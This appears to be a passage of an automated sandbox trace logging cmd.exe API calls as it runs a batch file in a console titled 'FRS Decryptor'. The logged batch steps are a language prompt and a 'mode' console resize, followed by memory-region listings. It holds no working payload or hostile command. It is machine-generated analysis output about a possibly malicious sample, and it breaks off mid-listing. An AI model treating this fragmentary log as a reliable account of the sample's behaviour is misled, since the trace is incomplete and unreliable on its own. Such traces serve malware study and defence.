[0068.972] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.972] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.972] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.972] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.972] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.972] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.972] GetFileType (hFile=0xc) returned 0x2 [0068.972] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.972] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.972] _get_osfhandle (_FileHandle=1) returned 0xc [0068.972] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x2) returned 1 [0068.972] _get_osfhandle (_FileHandle=1) returned 0xc [0068.973] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.973] _get_osfhandle (_FileHandle=1) returned 0xc [0068.973] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.973] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.973] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.974] SetConsoleInputExeNameW () returned 0x1 [0068.974] GetConsoleOutputCP () returned 0x1b5 [0068.975] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.975] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.975] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.975] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.975] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.975] SetFilePointer (in: hFile=0xa0, lDistanceToMove=646, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x286 [0068.975] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x286 [0068.975] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1b6f, lpOverlapped=0x0) returned 1 [0068.975] SetFilePointer (in: hFile=0xa0, lDistanceToMove=653, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x28d [0068.975] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=7, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo.\r\n [2] English\r\n Select your language: \r\n____________________________________________________\r\n") returned 7 [0068.975] GetFileType (hFile=0xa0) returned 0x1 [0068.975] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.975] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x28d [0068.975] _tell (_FileHandle=3) returned 653 [0068.975] _close (_FileHandle=3) returned 0 [0068.975] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.975] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.975] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.975] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.976] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.976] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.976] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.976] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.976] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.976] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.976] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.976] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.976] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.976] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.976] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.976] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.976] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.976] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.976] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.976] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.976] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.976] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.976] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.976] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.976] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.976] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.976] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.976] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.976] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.976] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.976] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.976] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.976] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.976] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.976] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.976] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.976] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.976] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.976] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.976] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.976] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.976] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.976] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.976] SetErrorMode (uMode=0x0) returned 0x0 [0068.976] SetErrorMode (uMode=0x1) returned 0x0 [0068.976] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.976] SetErrorMode (uMode=0x0) returned 0x1 [0068.976] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.976] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.976] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.976] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.977] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.977] GetLastError () returned 0x2 [0068.977] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.977] GetLastError () returned 0x2 [0068.977] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.977] GetLastError () returned 0x2 [0068.977] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.977] GetLastError () returned 0x2 [0068.977] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.978] GetLastError () returned 0x2 [0068.978] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.978] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.979] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.979] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.979] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.979] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.979] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.979] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.979] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.979] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.979] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.979] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.979] GetFileType (hFile=0xc) returned 0x2 [0068.979] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.979] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.979] _get_osfhandle (_FileHandle=1) returned 0xc [0068.979] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x2) returned 1 [0068.979] _get_osfhandle (_FileHandle=1) returned 0xc [0068.979] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.980] _get_osfhandle (_FileHandle=1) returned 0xc [0068.980] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.980] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.980] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.980] SetConsoleInputExeNameW () returned 0x1 [0068.980] GetConsoleOutputCP () returned 0x1b5 [0068.980] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.980] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.981] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.981] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.981] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.981] SetFilePointer (in: hFile=0xa0, lDistanceToMove=653, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x28d [0068.981] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x28d [0068.981] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1b68, lpOverlapped=0x0) returned 1 [0068.981] SetFilePointer (in: hFile=0xa0, lDistanceToMove=664, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x298 [0068.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="set lan=2\r\n] English\r\n Select your language: \r\n____________________________________________________\r\n") returned 11 [0068.981] GetFileType (hFile=0xa0) returned 0x1 [0068.981] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.981] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x298 [0068.981] _tell (_FileHandle=3) returned 664 [0068.981] _close (_FileHandle=3) returned 0 [0068.981] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0068.981] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0068.981] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0068.981] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0068.981] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0068.981] _wcsicmp (_String1="set", _String2="CD") returned 16 [0068.981] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0068.981] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0068.981] _wcsicmp (_String1="set", _String2="REN") returned 1 [0068.981] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0068.981] _wcsicmp (_String1="set", _String2="SET") returned 0 [0068.981] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.982] _wcsnicmp (_String1="la", _String2="/A", _MaxCount=0x2) returned 61 [0068.982] _wcsnicmp (_String1="la", _String2="/P", _MaxCount=0x2) returned 61 [0068.982] SetEnvironmentVariableW (lpName="lan", lpValue="2") returned 1 [0068.982] GetEnvironmentStringsW () returned 0x1428940* [0068.982] FreeEnvironmentStringsA (penv="=") returned 1 [0068.982] _get_osfhandle (_FileHandle=1) returned 0xc [0068.982] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.982] _get_osfhandle (_FileHandle=1) returned 0xc [0068.982] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.982] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.982] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.983] SetConsoleInputExeNameW () returned 0x1 [0068.983] GetConsoleOutputCP () returned 0x1b5 [0068.983] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.983] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.983] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.983] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.983] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.983] SetFilePointer (in: hFile=0xa0, lDistanceToMove=664, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x298 [0068.983] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x298 [0068.983] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1b5d, lpOverlapped=0x0) returned 1 [0068.983] SetFilePointer (in: hFile=0xa0, lDistanceToMove=726, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2d6 [0068.983] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="set /p lan=╩Σ╚δ║≤╟δ░┤[Enter]:/ Press [Enter] after entering:\r\n_______________________________________\r\n") returned 62 [0068.983] GetFileType (hFile=0xa0) returned 0x1 [0068.984] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.984] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2d6 [0068.984] _tell (_FileHandle=3) returned 726 [0068.984] _close (_FileHandle=3) returned 0 [0068.984] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0068.984] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0068.984] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0068.984] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0068.984] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0068.984] _wcsicmp (_String1="set", _String2="CD") returned 16 [0068.984] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0068.984] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0068.984] _wcsicmp (_String1="set", _String2="REN") returned 1 [0068.984] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0068.984] _wcsicmp (_String1="set", _String2="SET") returned 0 [0068.984] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.984] _wcsnicmp (_String1="/p", _String2="/A", _MaxCount=0x2) returned 15 [0068.984] _wcsnicmp (_String1="/p", _String2="/P", _MaxCount=0x2) returned 0 [0068.985] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.985] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8 [0068.985] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x10ee3cc | out: lpMode=0x10ee3cc) returned 1 [0068.985] SetConsoleMode (hConsoleHandle=0x8, dwMode=0x1a7) returned 1 [0068.986] _get_osfhandle (_FileHandle=1) returned 0xc [0068.986] GetFileType (hFile=0xc) returned 0x2 [0068.986] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.986] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10ee320 | out: lpMode=0x10ee320) returned 1 [0068.986] _get_osfhandle (_FileHandle=1) returned 0xc [0068.986] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xc, lpConsoleScreenBufferInfo=0x10ee370 | out: lpConsoleScreenBufferInfo=0x10ee370) returned 1 [0068.986] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2371, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1") returned 0x2 [0068.986] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2371, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x10ee3a0 | out: lpBuffer="╩Σ╚δ║≤╟δ░┤[Enter]:/ Press [Enter] after entering:") returned 0x31 [0068.986] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x10ee354, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10ee354*=0x31) returned 1 [0068.987] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8 [0068.987] GetFileType (hFile=0x8) returned 0x2 [0068.987] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.987] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xc, lpConsoleScreenBufferInfo=0x10ee374 | out: lpConsoleScreenBufferInfo=0x10ee374) returned 1 [0068.987] ReadConsoleW (hConsoleInput=0x8, lpBuffer=0x10ee3e0, nNumberOfCharsToRead=0x3ff, lpNumberOfCharsRead=0x10ee3d8, pInputControl=0x10ee364) Process: id = "44" image_name = "mode.com" filename = "c:\\windows\\syswow64\\mode.com" page_root = "0xbaf5000" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x958" cmd_line = "mode con cols=100 lines=30" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2057 start_va = 0xb90000 end_va = 0xb99fff entry_point = 0xb90000 region_type = mapped_file name = "mode.com" filename = "\\Windows\\SysWOW64\\mode.com" (normalized: "c:\\windows\\syswow64\\mode.com") Region: id = 2058 start_va = 0xfd0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 2059 start_va = 0xff0000 end_va = 0xff1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 2060 start_va = 0x1000000 end_va = 0x100efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001000000" filename = "" Region: id = 2061 start_va = 0x1010000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 2062 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 2063 start_va = 0x1090000 end_va = 0x1093fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001090000" filename = "" Region: id = 2064 start_va = 0x10a0000 end_va = 0x10a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010a0000" filename = "" Region: id = 2065 start_va = 0x10b0000 end_va = 0x10b1fff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 2066 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2067 start_va = 0x7f9b0000 end_va = 0x7f9d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f9b0000" filename = "" Region: id = 2068 start_va = 0x7f9d5000 end_va = 0x7f9d5fff entry_point = 0x0 region_type = private name = "private_0x000000007f9d5000" filename = "" Region: id = 2069 start_va = 0x7f9dc000 end_va = 0x7f9defff entry_point = 0x0 region_type = private name = "private_0x000000007f9dc000" filename = "" Region: id = 2070 start_va = 0x7f9df000 end_va = 0x7f9dffff entry_point = 0x0 region_type = private name = "private_0x000000007f9df000" filename = "" Region: id = 2071 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2072 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2073 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2074 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 2075 start_va = 0x10c0000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 2076 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2077 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2078 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2079 start_va = 0xfd0000 end_va = 0xfdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 2080 start_va = 0xfe0000 end_va = 0xfe3fff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 2081 start_va = 0x10d0000 end_va = 0x114dfff entry_point = 0x10d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2082 start_va = 0x11c0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 2083 start_va = 0x73660000 end_va = 0x73680fff entry_point = 0x73660000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 2084 start_va = 0x73da0000 end_va = 0x73da9fff entry_point = 0x73da0000 region_type = mapped_file name = "ureg.dll" filename = "\\Windows\\SysWOW64\\ureg.dll" (normalized: "c:\\windows\\syswow64\\ureg.dll") Region: id = 2085 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2086 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2087 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2088 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2089 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2090 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2091 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2092 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2093 start_va = 